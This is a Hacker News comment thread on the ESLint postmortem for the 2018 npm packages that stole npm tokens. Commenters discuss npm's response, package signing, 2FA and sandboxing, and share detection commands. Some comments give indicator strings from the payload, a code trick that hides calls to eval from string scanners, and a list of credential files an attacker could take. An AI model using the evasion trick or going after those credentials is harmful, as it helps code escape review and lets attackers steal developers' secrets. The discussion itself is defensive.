Hacker News new | past | comments | ask | show | jobs | submit login
Postmortem for Malicious Packages Published on July 12th, 2018 (eslint.org)
329 points by ingve on July 12, 2018 | hide | past | favorite | 155 comments



When we heard about this this morning at RunKit we immediately started writing a script to identify if any other packages had been possibly affected. We're in a pretty unique position since we install every version of every package in a sandbox environment as soon as it is published. The scan is pretty simple (just looking for a few key strings), and designed to catch any pre-discovery propagation. The scan is running as we speak and we've unfortunately found at least one unreported case. Luckily it seems to be a package not in too frequent use, and the way the virus propagated was also pretty bizarre (through `bundledDependencies`).

We've created a GitHub repo to track our progress that you can visit here: https://github.com/runkitdev/eslint-scope-scan

We will immediately file issues on any packages we find the exploit in. We are also open to suggestions to more sophisticated further approaches after this initial scan. Additionally, we are internally working on adding some sanity checks to the installation pipeline that might one day catch this sooner (such as monitoring network requests and file modifications during our sandbox install). Please let us know if you have any other ideas.


A log of network requests made on install would be a valuable start. Even if it doesn’t reveal anything actively hostile, I imagine there’s plenty of telemetry servers getting pinged and probably some http going on (both of which the package may also do at runtime but that’s a whole other problem)


FYI, I've downloaded all package versions uploaded between 2018-07-12T09:49:24.957Z and 2018-07-12T12:30:00Z (first compromised eslint package upload and key invalidation time), and got no hits for your signature strings in them.


key invalidation time was 2018-07-12 18:42 UTC

How did you produce this list btw?


I'm still not totally clear on that, btw - they claim they invalidated keys created before 2018-07-12T12:30:00Z, but they did it at 2018-07-12 18:42 UTC. I can't decide if that's problematic.

I downloaded the contents of the npm couchdb and did an exhaustive search of version timestamps.


they invalidated keys based on when the attack became non-functional (due to the pastebin getting removed at 12:27 UTC). But the window in which any packages could potentially have been similarly compromised is from the point the attacker had access to tokens through the point they were invalidated.


Amazing work! I'll be following along keenly... and glad to know there's an exhaustive approach being taken to figuring out if anything else was affected


The npm team's lack of responsible action here is astonishing, if not surprising. If a token for these very popular packages was compromised, then every user of those packages could conceivably have had their tokens compromised, not just those that have it as a downstream dependency. That means every single package published between the vulnerable packages and the mass token invalidation is suspect and should be unpublished until it can be audited. npm's position that "a very small number" of packages were compromised is minimizing a potentially massive issue. Their promise to "[conduct] a deep audit of all the packages in the Registry" both misses the point and is ineffective.

I have come to expect no less from npm, and by extension, nodejs.


NPM revoked all tokens. How is that irresponsible?

https://status.npmjs.org/incidents/dn7c1fgrr7ng


For one, they've marked the issue as resolved before they've completed any forensic analysis to discover if additional compromised packages were uploaded with stolen credentials during the window in which they weren't revoked.

This gives the false sense that its safe to install packages again.


And the fact they don't get this is incredibly disconcerting.


There's also no systemic fix for this issue. Next week, the same thing could happen again.

It's time to enforce two-factor authentication for publishing packages.

It's time to publish a roadmap towards package signing and verification.

It's time to talk about sandboxing the install scripts to prevent token theft.

We're done for the day is so far from sufficient.


> package signing and verification

You're the first person I've seen mention this, which seems like it should be the first and most obvious line of defense against bad stuff like this. +1


People mention most of these steps every time npm fucks up (which is often).

Package management is a mostly solved problem, but npm refuses to learn from the 30+ years of experience that Linux and other communities have had.


I used to be one of the biggest HN proponents of dunking on Node. I would give it a thrashing second only to the windmill dunks I would line up on Go.

These days, with ES6, TypeScript, and React...it's actually all pretty nice.

But NPM is still and forever a mess that just plain didn't learn from its predecessors--and my only guess as to the cavalier treatment of security issues is that the NPM crew's a bunch of premillenial dispensationalists banking on getting raptured (or bought, I guess, but that's way less fun) before the chickens come home to roost, 'cause just about anything else seems implausible.

I am thinking about getting in on Deno only and strictly because maybe that can have a package management solution that is not held captive by an irresponsible venture-backed entity. It's not like anyone's breaking NPM's grip anytime soon. (Even if you tried, their API is so awful as to be functionally incompatible unless you literally just copy their internal structure, so...yeah. Great. Hooray.)


> ES6, Typescript, React

NodeJS didn't make those - they'd be around with any nodejs alternative.

btw, nodejs should provide some "isolated" mode (ie run as user "nobody-projectName-userName" - eg. "nobody-react-whatcanthisbee") and do some appropriate group permissions.

basic linux permissions can do a lot...


what saddens me is that there seems to be no way out. There are so many projects that worked fine in the past and now the're using npm, for example PhoneGap.


Signing packages works well for a linux distro. It's much less clear that it would help for a language package manager: https://caremad.io/posts/2013/07/packaging-signing-not-holy-....


None of the criticisms of package signing here apply in this case. Package signing does cover this exact issue, which we should describe to be specific:

(1) someone has published a package. (2) that package has become well known and used enough that the community as a whole trusts that the entity publishing that package is not there for malicious purposes (3) the maintainer of that package has their account compromised, either by credential leak or by a vulnerability in the package management system itself (in this case, the former and not the latter)

If the package were signed, then the attacker could not have published this fake package that lead to issues today. Does this solve the root chain of trust issue for whose packages you should trust? No, but nothing other than thoroughly reviewing every line can do that. Does it prevent you from having a random unknown person masquerade as the maintainer and publish a malicious package? Yes.

There are real additional trust issues to solve, but let's not let those detract from the fact that package signing would have prevented the exact issue which we saw today. Defense in depth, always.


I'm not going to say that you're wrong in any particular thing you said. You are correct that package signing would have prevented this exact issue we saw today, and I'm not opposed to an argument for defense in depth.

However, I am going to reiterate my original point with a bit of clarification: "it is not clear that package signing will prevent malicious actors from compromising systems using a language package manager with anything approaching the success of distro package managers".

I think what you're proposing amounts to a two-tier system. There is somehow a set of known signatures that are trusted by the npm consumer[0] and then a vast sea of untrusted signatures. Developers sometimes add libraries, and add one (or more?) signatures to their trusted set.

First, in the specific case of NPM, we have an existing system with huge numbers of transitive dependencies and no existing package signing. I don't see how you retrofit signing on to that system. Too many developers will ignore it, but also because there are so many libraries, you'll have an absolutely massive number of trusted keys.

Second, suppose you're starting from scratch, so you can enforce signatures from day one. You still have the problem of transitive dependencies. It's certainly more work for a malicious actor to either a) create legitimate libraries that will be included in other libraries, then convert them to malware, or b) steal a developer's signing keys, but neither one is remotely impossible, given the large number of libraries involved. You just need one part of that web of libraries to involve a sloppy or malicious developer, and you are hosed.

[0] Interesting question: how is this handled? Is it part of the lockfile for a project? Something system level, with the problems of devs installing random shit on their machines and ending up with too much being trusted, and also lack of reproducible builds?


That's from the maintainer of pypi. Pypi shipped SSH Decorator with malware that stole SSH keys. Another case that would have been entirely preventable with package signing. I've concluded they don't know what they're doing either.

I'm not surprised if you don't know about it, because it was [dead] on HN as soon as it was posted... which should tell you a bit about the echo chamber you're in here.

https://imgur.com/gdUFToP


Except none of these comments take into account the fact that actually no one verifies apt package signatures either, and this fairy tale world where all of this is a solved problem in some other domain is not manifest.

https://blog.packagecloud.io/eng/2018/02/21/attacks-against-...

The reason that package signing never really matters that much is that once you boil the thrat model down to package publish credentials are compromised or package repository infrastructure is compromised, the form of credentials involved is of little consequence to the prior and uninvolved in the latter. The threat is against the client, not intermediates.

The original developer here reused credentials. There is nothing in signing that protects from this attitude. This attitude is the one that also reuses credentials for signing keys, if encrypting them at all - I'd bet this user has numerous stale ssh keys and never encrypted any of the secrets. Some of the top eslint contributors have multiple short rsa keys on their GitHub. None of them have modern keys.

There are more effective places to invest to better protect users. Auditing infrastructure for example.


The most worrisome on that page is the arbitrary package attack, and on my Debian installation it's not feasible. The insecure apt.conf settings are not enabled on Debian by default. Saying that the package signing of apt is absolutely ineffective is dishonest.

Note that metadata signing in apt is just indirect package signing. The package sha256 sums are part of the metadata. It looks like that dpkg too have support for package signing, but at that point it would be redundant.


This is an obvious ad hominem attack, and completely missed the point of the pypi post.

If someone says "this problem cannot reasonably be solved", you don't get to discredit them by saying "look, you had the problem!" You have to actually rebut their arguments and say that it can be solved.


It would have prevented this from happening.


In fact, there's a pull request from 2013 for GPG package verification. It took over a year for a response from NPM, shooting it down. There's already an "I told you so" in the thread.[0]

>Thank you for your time and effort.

Yeah, thanks to you too, NPM. No time or effort to go around for progress on this issue in the interim 3 years, apparently.

[0]https://github.com/npm/npm/pull/4016#issuecomment-76316744


If the hacker has your password, don't they also have the ability to publish a public key used to verify the signed package? It presumably would protect against distribution of a fake package outside of NPM, but if your NPM account is hosed isn't it too late?


If 2fa is enforced, having your password doesn't get you anything. Publishing an npm package isn't having a Twitter account, it's one of those things where enforcing 2fa shouldn't even be a usability question.


how does 2fa work with auto publishing CI pipelines?


Not necessarily. Have NPM store the public key, and require a lot of red tape and time to update it (versioning with delays).

Require multiple keys to sign or vouch for a package before publishing is complete (log of reverse dependencies +1 maybe).

There are lots of options.


I don't think sandboxing install scripts will help much, as any code in the package will be executed when that package is require()'d. You really need to sandbox the whole of `node`.


* eslint gets compromised, and 3.7.2 is published

* eslint user FooCorp also gets compromised, and a similarly-malicious version of foolib-js gets published that includes the _same code_ to steal tokens

* npm invalidates all tokens

* you decide to use foolib-js, and your newly-minted token is now compromised

npm are fucking this up, and royally.


While this is possible, I'm willing to give the NPM team at least a little benefit of the doubt that they actually researched the access logs before they state this:

> We determined that access tokens for approximately 4,500 accounts could have been obtained before we acted to close this vulnerability. However, we have not found evidence that any tokens were actually obtained or used to access any npmjs.com account during this window.[1]

I get that it's possible that other modules could already be infected, but it's also true that other modules could have been similarly infected long before this one.

[1] https://blog.npmjs.org/post/175824896885/incident-report-npm...


Your quote wonderfully illustrates that npm are either being obfuscatory or entirely missing the point.

How did they determine tokens for 4,500 accounts could have been obtained, and what is that even supposed to mean? The problem here is that any user of these packages could have had their .npmjs file read and exfiltrated, not just some upstream package maintainer. Were there only 4,500 valid npm tokens or something? I cannot imagine that is the case.

So either they looked at 4,500 packages uploaded during the compromise window and they're not explaining how they undertook to do that, or they don't understand the vector and are minimizing the severity of the issue.


I would assume their logs would possibly tell them which tokens were associated with the users that downloaded v3.7.2. npm probably doesn't need credentials to download a package so the number of downloads is likely higher. Determining other packages affected are another matter entirely and no one can say this attack vector is only bound by this specific date window. This could've been way more widespread unless they're unpacking payloads and grepping for key pieces of this specific attack.

I think it would be helpful if they could expose some of those logs but considering the meat of what matters would be the IP addresses to verify if your machine was compromised (or your CI server) that GPDR effectively wiped that possibility off the table. It would almost behoove them to setup a kind of haveibeenpwned service where you can check against stuff like this in the future. It's not like this can't happen again as the hole hasn't been closed completely, only this one set of compromised packages appears clean for now.


A malicious change could have already been published somewhere else, couldn't it have? And we just haven't found it yet?


Just saying they didn't do nothing. Maybe they didn't do as well as they could have, but they did do something.


Calling it resolved is worse than doing nothing. If they had done nothing, at least people would know that "If I run npm install now, that's bad". Now they've claimed it is resolved, which tells their users "It's okay to start installing things again" when it isn't safe until an audit has been completed.


You can see a list of all npm packages uploaded between the time that the first compromised eslint package was uploaded and the token invalidation time here:

https://gist.github.com/thenewwazoo/0306aa06aafe7807497ed1db...


To follow up, I've downloaded all of the versions indicated here and none include the strings `raw/XLeVP82h`, `sstatic1.histats.com`, nor `statcounter`, and none of the included `build.js` files contain `eval`. Not an exhaustive test.


Further follow up: I've updated the gist to include all packages between the time at which the first compromised package was uploaded and the time at which the keys were invalidated (which was later than the invalidation threshold). I'm working on auditing the larger (~2000) list of packages now.


Final follow-up: a more-exhaustive search also returned no evals in build.js files, nor any obviously-suspicious strings.


Have you checked for

    \u0065val
or

    e\u0076al
or any other combination of it?


This is impossible in general.

  eval === this[[1,18,-3,8].map(x=>String.fromCharCode(x+100)).join("")]
https://jsfiddle.net/hkvu9s47/


That's the point. That just checking for occurrences of strings like 'eval' just gives you false sense of security.


> That means every single package published between the vulnerable packages and the mass token invalidation is suspect and should be unpublished until it can be audited.

I wonder how many packages in fact got published during that nine-hour time window. Does anyone know what kind of number that would be?


I'm currently dumping the npm db right now to figure that out.

eslint-scope 3.7.2 was published on 2018-07-12T10:40:00.478Z eslint-config-eslint 5.0.2 was published on 2018-07-12T09:49:24.957Z tokens were invalidated at 2018-07-12 12:30 UTC


> tokens were invalidated at 2018-07-12 12:30 UTC

I'm reading it as tokens created before 2018-07-12 12:30 UTC were invalidated, but the invalidation itself happened on 2018-07-12 18:42 UTC according to eslint's post-mortem[1]. I think the latter is the more relevant date.

[1] https://eslint.org/blog/2018/07/postmortem-for-malicious-pac...


If I understand the npm incident report correctly, the answer is none:

> We determined that access tokens for approximately 4,500 accounts could have been obtained before we acted to close this vulnerability. However, we have not found evidence that any tokens were actually obtained or used to access any npmjs.com account during this window.

Source: https://blog.npmjs.org/post/175824896885/incident-report-npm...


The wording is pretty vague, I guess intentionally, but saying "we found no evidence..." isn't as confidence-inspiring as if they'd said "we determined that no...".


  "npm has revoked all access tokens issued before 2018-07-12
  12:30 UTC. As a result, all access tokens compromised by
  this attack should no longer be usable."


"access tokens compromised by this attack should no longer be useable", but tokens compromised by other compromised packages published during the intervening period will still compromise you.


Slightly off topic, but this could happen in any language, not just node. I saw Maven does not check pgp signatures.

So, I just finished a Maven plugin that verifies each artifact in the build has been signed by a pinned pgp key. This would make it now difficult for an attacker to hijack another artifact's namespace.

https://exabrial.github.io/pgp-signature-check-plugin/

I tried to make the code AS straightforward as possible, using dependency injection to make testing easy. My Hope Is you start using this in your open source projects and at your job


Until a couple years ago Maven didn't even use SSL... The Node ecosystem has its fair share of issues but I think it takes a disproportionate amount of flak.

https://www.infoq.com/news/2014/08/Maven-SSL-Default


It isn't disproportionate given the yearly advances in understanding and awareness of security issues, or disproportionate given their size and the number of security issues that they have already experienced.

Alternatively, we as a community can continue to call it a toy that nobody should trust or use for anything serious, and then the flak isn't disproportionate since you shouldn't have been using it for anything important anways, but you can't have it both ways.


I think it's worse here because every damn node project installs 100s if not 1000s of npm packages.


org.simplify4u.plugins:pgpverify-maven-plugin works well for me. But here we are. There's multiple ways to verify package authenticity with maven. There isn't even signatures in NPM. NPM is belligerently against end user security. They won't even accept a pull request if you do the work for them.

https://github.com/npm/npm/pull/4016


Yep, I used that plugin. I made my file format compatible with his intentionally.


Right but node projects tend to use ten billion trivial packages to do anything whatsoever (no standard library!) so the problem does get exacerbated. Moreover, npm has been told multiple times how to avoid this and they did not care.


One further note... The version of Sonatype Nexus that Maven Central is running does not support signing with a subkey, and does not support ECDSA. Unfortunately, the software that needs to be fixed is proprietary.

If someone has a contact at Sonatype, I'd love to talk to them about fixing this.


The source code is at https://github.com/sonatype/nexus-public.

Not sure if Maven Central is running on the closed-source version, though.

> If someone has a contact at Sonatype, I'd love to talk to them about fixing this.

Contact them by email, they're quite responsive.


Thanks. I checked the code out but it does looks like that part is not open source :( I'll email them


>Before the incident: The attacker presumably found the maintainer’s reused email and password in a third-party breach and used them to log in to the maintainer’s npm account.

Password managers and MFA, people! Please use them. There's never a reason to not use a password manager for every website, application, and service that requires credentials. And MFA isn't everywhere, but for places that support it: use it. Ideally non-phone based if that's an option, to prevent risk of phone number/voicemail-related compromises.


> There's never a reason to not use a password manager

Sage advice. Right until the day that there is a major exploit of a popular password manager.


If you fear a browser extension-based vulnerability (like an XSS vulnerability that allows an attacker to send all of a visitor's passwords to their server), use a native application like KeePass. You lose some convenience, but it's just a few extra steps when logging in and registering.

It's certainly not impossible that some major flaw will eventually be found in KeePass, but it's stood the test of time so far, and it's hard to imagine how it could be mass exploited considering it basically just reads and writes a local AES-encrypted file. Even if someone finds something that lets you completely bypass the encryption (which is very unlikely), they'd still need to gain access to your hard drive (or wherever you're storing the file).

But I'd also say the net security benefit of a lot more people using something like LastPass or 1Password would still outweigh the damage of a future vulnerability.

Either way, there is really no excuse for password reuse in 2018, especially when your password for managing your super popular software package running on an enormous amount of devices is the same as the password to your Harry Potter fanfic forum account or whatever.


I use KeePass and have a local kbdx file for this reason - imo LastPass and the like are a huge target. This does require a lot more work since you have to manage keeping a file in sync on your laptop/phone/device and literally cannot get a password without one of those near you. (I have obscene overkill settings for encryption and key transformations in case I lose a device and someone tries to brute-force).

one thing that is without dispute is that a password manager will not reuse or slightly vary the same password which is what human beings pretty much always do.

also some popular ones have integrations for reissuing credentials for major sites. in theory if there were some huge compromise you change your master key and reissue as many pw automatically as possible. then focus on the ones in the list that you know have your credit card saved or are essential for other reasons (npm credentials). you also literally have a list to go down at the point anyway. what is the alternative scenario if your 'same password everywhere' pw is compromised ... try to remember which websites you use and might be the biggest issue and literally manually change every single one?


The surface area of attack is still lower. You need one more thing to be broken before this situation happens. If a hacker needed 3 things in place to own you, they now need 4 things. And a password manager exploit is a big 4th thing.


Great advice. I tell people that using a password manager is almost always better than not using one. Pick one that works for you and your devices and just use it.


My password manager is accessed through an SELinux enforced VM without networking. AFAIK this is as secure as I'm going to get (debating the tradeoffs between a VM and airgapped machine) without using Qubes.

But at least, in the event of an exploit, the VM is still without networking.


I guess it may depend if you're running on Intel or AMD hardware i.e. if the Intel ME stuff has total memory access and its own Minix OS and networking etc.


The alternative here is password reuse for most people. That's so much worse. Lesser "evil" I'd say.


> Password managers and MFA

You conveniently forgot about the MFA part. The attacker will still need the other factor.


As long as they encrypt the stored passwords and you don't use your master password anywhere else, there's not much that can go wrong.


Unless, say, someone uploaded malicious code to a repo with a dependancy the password manager pulls in which changes that behaviour...

Some code somewhere needs to be able to decrypt all those stored encrypted passwords - that code is a _super_ high value target.

I like/use/recommend/have-paid-for 1Password for 5-6 years now - but I worry that the online and 1Password for Teams implementation - even though I trust the 1Password team to "get it right" - has got to be a really "fun" target for sufficiently motivated and resourced attackers. (If I were sitting round at the NSA looking for a fun project - automated MITM of 1Password traffic at p0wned or backdoored-by-agreement carrier or IX routers, using trusted root CA certs to create legitimate-seeming SSL certs, and on-the-wire JavaScript code injection... I reckon I could sell that to my super-sekrit-PHB as a worthwhile research project. )


I use self-synced standalone 1Password for this reason. Much smaller attach surface.


The browser extensions can provide a big attack surface. But otherwise, you're right.


I use `pass`, which is basically gpg+git+xsel. My user account could be compromised, but it won't be through my password manager.


Well, on the worst case scenario, you get not worse than before. So this seems a net win.


> Password managers and MFA, people!

You're preaching to the choir on HN.

This needs to be posted on LinkedIn, Facebook, the *Grams, Imgur, Pinterest, etc.


>You're preaching to the choir on HN.

I would've thought so, but clearly one of the maintainers of eslint-scope didn't follow the advice.


Do you think the ESLint maintainer does not visit HN?


There are lots of technical people that do not visit HN, and there are lots that do. The set of HN users/visitors is not the entire set of technical people.


That's how you get the choir to sing.


The most important lessons here is clear: always turn on MFA if you can, but more importantly: use a password manager. The risk from password reuse is just far too great, and there's no other reasonable way to have unique, strong passwords everywhere. In this day and age, it's irresponsible security practice to not take this step, especially if you're a developer with special access.


I thought the most important lesson here is that npm is a horrible single-point of failure with a terrible security track record and obtuse leadership, but has somehow become the backbone of an entire ecosystem within our industry.


That’s one takeaway. There isn’t an alternative, though, so this isn’t actionable.


No, it is actionable - create an alternative.


> create an alternative

Or maybe just adopt one of the dozens that have been around for longer than NPM in the first place.


Was there ever a real adoptable alternative to npm for node packages? I'm all ears for suggestions.


https://en.wikipedia.org/wiki/List_of_software_package_manag...

There are many, most are open source, several have or could be ported to windows. What does npm offer that couldn't have been handled with an apt or rpm repository?

The obsessions of reinventing everything in every language is a giant waste of time.


Please do! I cannot.


Specially maintainers of popular NPM packages.

eslint-scope has 500K downloads every day for god's sake.


Other lessons could be taken from this. For example:

When you build a package management system that has user-configurable exec scripts, run them in a secure sandbox/container by default. If you provide an override, require a user to approve it and show them the command that will be run on their system.

If npm package.json scripts only ran in a lightweight linux container with no access to the filesystem, the mere act of doing an `npm install` could not pwn your box.

Another possible takeaway would be that everyone should use Qubes, or some similar project, such that the machine where they use npm doesn't contain any important credentials, and then all publishing is done in CI or in another qubes vm dedicated to the purpose which publishes a shrinkwrapped artifact rather than installing locally.


You don't even need containers on linux. If SELinux was more accessible, this would be a very cool use case.

You could set the security context of your NPM access credentials to something other than unconfined and ensure that only processes with a specific security label can access files tagged with that security context. These security labels in term are kernel controlled. So at that point, a malicious install script needs to escalate to root in order to steal your credentials.

It's kinda sad how such a powerful and rather simple tool is so hard to use.


While it would be nice to be able to run `npm install` fearlessly, how much would it truly help? In almost all cases, the code downloaded from npm will be executed non-sandboxed anyways; that's probably the reason you installed the package after all.


Regarding password managers, I feel uncomfortable, especially when it comes to high-value targets like developers of important software.

If you're a potential target for malicious actors, is it a good idea to have a single point of failure for your logins? I certainly see the point about the realities of password reuse, but can we quantify the risks of one approach vs the other somehow?


> is it a good idea to have a single point of failure for your logins?

Just like logging into to 2 SaaSes from the same computer... at which point a keylogger/camera/microphone on/near that computer becomes the single point of failure.

There is a point at which too much paranoia paralyzes a person into inaction. Criticizing people for not defending against nation-state level attacks (eg. Password Manager attacks) when we can't even defend ourselves against the neighbor's son (credential stuffing without 2FA) seems like putting the cart before the horse.


While I really like 1Password - I do in my more paranoid moments wonder if it's become so well known and popular that it's probably a worthwhile target for attackers smaller than nation states?

It's pretty obvious some of the cryptocurrency thefts have been for amounts far in excess of what a seriously talented group would need to consider taking on a password manager...


fwiw a password manager doesn't have to be such a single point of failure.

I use `password-store`, which means to get a password I just need access to my gpg key.

My gpg key lives on 3 yubikeys and in 1 bankvault as a paper backup.

If my main yubikey is destroyed or I somehow forget the pin to it, I just need to go to the bank vault.

If I wanted to err on the side of being more able to access it, I could leave an unencrypted copy of the gpg master key with a trusted friend.

Since there are many password managers with different models, I think it's difficult to quantify exactly the failure mode of each.

However, the reality is almost all security experts recommend password managers, and almost everyone who uses 1password for a while doesn't want to go back.. so clearly there's something to it.

The only people I see doubting are people who have uneasy feelings but haven't really written down their threat model nor consulted security professionals.


The node development environment is bananas.

On the web, executing third-party controlled JS code is considered a profound (XSS) vulnerability, despite browsers being equipped with the strongest sandboxing. Tiny cracks are leveraged into click fraud, cryptocurrency mining, and other nefarious activities.

Meanwhile website build processes indiscriminately pull in random modules and their transitive dependencies. Modules may inadvertently stumble into a core role, like left-pad.

Popular Chrome web extensions get large monetary offers, and npm modules are surely next in line (if it's not already happening).


I don't usually repost the same comment from one story to the next, but this might be helpful...

Here's how I checked my own machine, though I was already confident I wouldn't be affected:

  find ~ -name eslint-scope -exec grep -H version '{}/package.json' \;
If you use yarn exclusively, this will also work:

  yarn cache list | grep eslint-scope-3.7.2


Until all packages published since this incident are reviewed thoroughly, you cannot be confident that you aren't affected if you did an npm install today at all. Other npm package authors likely had their credentials stolen, which could mean that their packages had malicious updates too, and so on down the chain. And just because this package "only" exfiltrated npm tokens, that doesn't mean the next infections affecting the packages from the compromised tokens have the same script.


I'm even more cynical than your are here.

I think the likelihood of this being the first time a credential-stuffing attack has worked against an npm account is vanishingly small.

While the timeline given makes the response time sound good - it still took a user notification 90 minutes after the first signs they've found so far of the attack to start kicking in the response.

I wonder how many npm packages are widely used but under _way_ less scrutiny than eslint?

Memories of the leftpad.js debacle make me suspect the attacker was not nearly as evil as possible - if they'd chosen a package that lives way down in the dependancy tree of a bunch of popular stuff, but which itself is unlikely to get much scrutiny, this attack might have slid under the radar for a lot longer. (And I've no confidence that this hasn't already happened, possibly multiple times, and this was just a copycat attacker who got "greedy" and foolishly dropped his attack payload onto a popular and heavily scrutinised package...)


> just a copycat attacker who got "greedy" and foolishly dropped his attack payload onto a popular and heavily scrutinised package

On that note, the main reason it was picked up was a bug in the attack itself. If the creator hadn't put the eval in the .on('data'... section and correctly waited until all data was received it wouldn't have thrown the SyntaxError. It may have flown under the radar for even longer.


It steals npm keys right? Maybe it was done in smaller less scrutinized packages and it finally hit pay dirt with a big package like eslint. They still don't know how it was compromised in the first place


Not having done an npm install today at all is why I'm confident.

EDIT: For those who have done an npm install today, I think those commands are still useful and catch the most probable way one could be affected.


Not having done an npm install today _probably_ is grounds for confidence.

It does though, assume that this discovery is the first time this has ever happened. If _I'd_ been considering doing this attack, I'd almost certainly have trialled it on a less popular and hence less likely to have malicious updates noticed package before hitting something like eslint.

Also, the postmortem leaves out any details of whether or how they've audited the rest of the repo - sure they've cleaned up the two packages they know about and revoked some tokens, but I'm not confident they've done the work required to allow confidence that other packages haven't been targeted in this or previous attacks, meaning they might still be leaking new post-revocation tokens.


More broadly, I think this point touches on the idea that you cannot trust code that you did not write yourself. Ken Thompson's Turing Award speech talks about this (https://www.archive.ece.cmu.edu/~ganger/712.fall02/papers/p7...).


Note that `eslint-scope` and `eslint-config-eslint` were both affected[1], so duplicate this search for both modules.

[1] https://eslint.org/blog/2018/07/postmortem-for-malicious-pac...


As an aside, doing

    find -exec [...] +
(note + instead of \;) will exec one grep process for as many arguments as possible, instead of one grep process per file.


Thanks for adding those commands.


    find ~ -path '*/eslint-scope/package.json' -exec jq -r 'input_filename+": "+.version' {} +
or just

    jq -r 'input_filename+": "+.version' ~/**/**/eslint-scope/package.json


I don't understand how NPM is such a dumpster fire. Countless other languages use package systems for a decade without constant issues.

I get the feeling pure JS is too dynamic for such a large codebase to be reliable. We switched to Typescript a few years back because of the same issue and I'll never look back.

All our JS/TS projects inevitably end up with rm -rf node_modules as the first build step. This has been a constant since NPM 1.X, and somehow at Node 9.0 it's still needed. I never used another package manager that was so unreliable that you need to delete all your packages just to build.

And the horrific error messages when things get messed up. I would rather debug assembly.

The regular leftpad level circus events are just icing on the cake. Please somebody replace NPM. It's even worse than the constant framework churn


What part of this attack is npm specific?

What feature of typescript would have prevented this?


NPM's not enforcing MFA for committers seems unwise. Also.. the gist seems like this should have been incredibly easy to catch with basic static analysis. The attack wasn't disguised in the slightest.


Why doesn’t npm extremely restrict public packages?

For instance, file operations could be limited to the root of the project and not access .git; it must not spawn sub-processes and http connections are limited to non-internal IPs.

I’m aware that most of these defenses could be defeated easily by using native modules et al. — but this needs to be dealt with ASAP. There’s just too many incompetent people in control of this and it’s just a matter of time until a company will pay big for this kind of horrendous engineering mistakes.

(How about an npm module hijacking a Mesos cluster by connecting to a master and deploying a service? We built a PoC of that in a hackathon and it was pretty disturbing how well it worked: running as root on all servers!)


Because UNIX security model ¯\_(ツ)_/¯ Pretty much every modern programming environment involves running arbitrary third party code as "you", with access to all of ~/ and whatnot.

How would you solve that on a package manager level? Static analysis? It's really difficult to make an analyzer that wouldn't be trivially defeated by obfuscation, and wouldn't at the same time have false positives all the time.

Sandboxing at the language runtime (in this case node) level? Theoretically a nice idea, but difficult to implement securely. Java has been trying. Besides the fact that practically no one uses it to isolate third party libraries in server/desktop apps, there were some serious vulnerabilities: https://www.thezdi.com/blog/2018/4/25/when-java-throws-you-a...

An OS level capability-based security model like Capsicum/CloudABI is a better solution, but again — doesn't fit that well with libraries. In Capsicum, you need a process boundary to isolate code, and that implies IPC, which is a thing developers absolutely love to use all the time… (not).

Here's an awesome research idea that I sadly do not have the time to work on: make a programming environment where all shared libraries are actually servers built as CloudABI executables, library calls are actually some super-fast RPC (with e.g. Cap'n Proto to avoid spending time on serialization, and of course fd passing for capabilities), and everything is handled as transparently as possible.

As a bonus, CloudABI solves the OS portability problem. Extra research idea: merge CloudABI with WebAssembly to solve the CPU portability problem as well. End result: same application runs on Linux/amd64 and NetBSD/toaster128, with secure sandboxing for every third party left-pad module.


You don't really need to isolate every library. Really, just every "project" (e.g. I just cloned X from Github).

And that does have process isolation.


Most projects that are typically cloned from github/npm/pypi/rubygems/cargo/whatever are libraries…


I was working on a PR for a Node project when I read about this. My changes added some new dependencies and I wanted to make sure I hadn't pulled in any packages that were updated after this incident began (since the authors of those packages might have had their credentials compromised and used to push malicious updates to their packages).

I wrote a script to extract all of my changed dependencies from package-lock.json and retrieve the publication date of the resolved version from registry.npmjs.org. It's hacky but here's the steps:

First run this pipeline. You can change the first two lines if you're interested in the whole package-lock.json; I was just interested in my changes.

    git diff master -- package-lock.json \
    | grep '+\s*"resolved":' \
    | awk '$2 == "\"resolved\":" {print $3}' \
    | cut -d '"' -f2 \
    | perl -pe "s/\/-\/(?:\\S+-)((?:[0-9]+)(?:\\.[0-9]+)+\\S+)\\.tgz/ \1/" \
    > dep-urls-and-versions.txt
You now have a file which contains on each line a URL, then a space, then a version string. I ran this python script on the file.

import requests

    with open("dep-urls-and-versions.txt", "r") as f:
        for line in f.readlines():
            url, version = line.strip().split(" ")
            res = requests.get(url)
            body = res.json()
            print(body["time"][version], body["name"])
Run it as `python script.py | sort` and you'll get the most recently published packages in your package-lock.json. Just check that the last (bottom-most) timestamp is older than 2018-07-12 10:25 UTC when the first compromised package was published.

Hope that helps someone.


I am very surprised they stopped at just grabbing your .npmrc. They could have grabbed basically anything they want like ~/.aws/credentials, your whole .bashrc (which often contains a whole slew of API keys and access tokens), and even your whole ~/.ssh


Clearly more could have been done. It's suspicious that they'd only grab npm tokens. Perhaps the responsible party just wanted to prove a point?


It looks like a virus that may try to replicate later on. If it passed unnoticed it could have gathered so much npm tokens to actually attack a much larger portion of developers. But nonetheless, starting with eslint should already provide quite a lot of credentials.


just get known_hosts and id_rsa rule the ~world~ cloud


Important detail: these packages are dependencies of a lot of things, most notably Webpack, so you can be exposed even if you haven't done anything specific with eslint.


We're lucky this issue was detected because of an error. I would bet this has happened or is happing now without anyone knowing. Javascript is particularly difficult to find malicious code as code can be executed in many forms. As long as eval exists and npm allows for pre/post-install functions and require executes code there's not much we can do except be ignorant to what's actually running every time we use node.


Moving forward NPM should require 2-factor authentication for popular packages.


This seems like a good idea. If a package has more than x downloads or y dependencies, then require 2fa for publishing it.


Or for publishing all packages


I cannot think of a reasonable argument against this if security is any priority at all at NPM.


Has anyone ever written a static analyzer to audit an npm package? Say I'm looking to add a new npm dependency, and I do my due diligence, pouring over the code, scanning the issues log, etc, and everything looks kosher. But then it would still be nice to run it through some kind automated analyzer, which also recursively scans dependencies. I ask because even simply grepping each file for the string "eval" would have flagged this.



There is a ‘npm audit’ command but that checks for known versions of a package that have a vulnerability so it’s not a static analyzer as far as I know.


Yeah I am thinking more something like linting+ for packages. And for published code, not code from the git repo.

    % analyze-some-npm-package some-package@2.1.1
    → some-package/foo.js contains a syntax error
    → some-package/bar.js calls eval() on line blah blah
    → sub-dependency@2.3.4 is only 2 hours old
...that sort of thing. I suppose it would be a pretty big undertaking.


I think all of those cases are possible today, you just need the right tools.

For example:

1. contains a syntax error: this is solved with TypeScript or flow which can run against a .js file

2. calls to eval(): this is solved by linting the .js file

3. only 2 hours old: this is solved by looking at npm publish date for the package version...take a look at the "time" key here: https://registry.npmjs.com/eslint-scope


What bothers me a lot, is that no one talked about a possible leak of private npm repositories accounts. Keys (along with repository urls) are usually stored in .npmrc along with all other stuff.

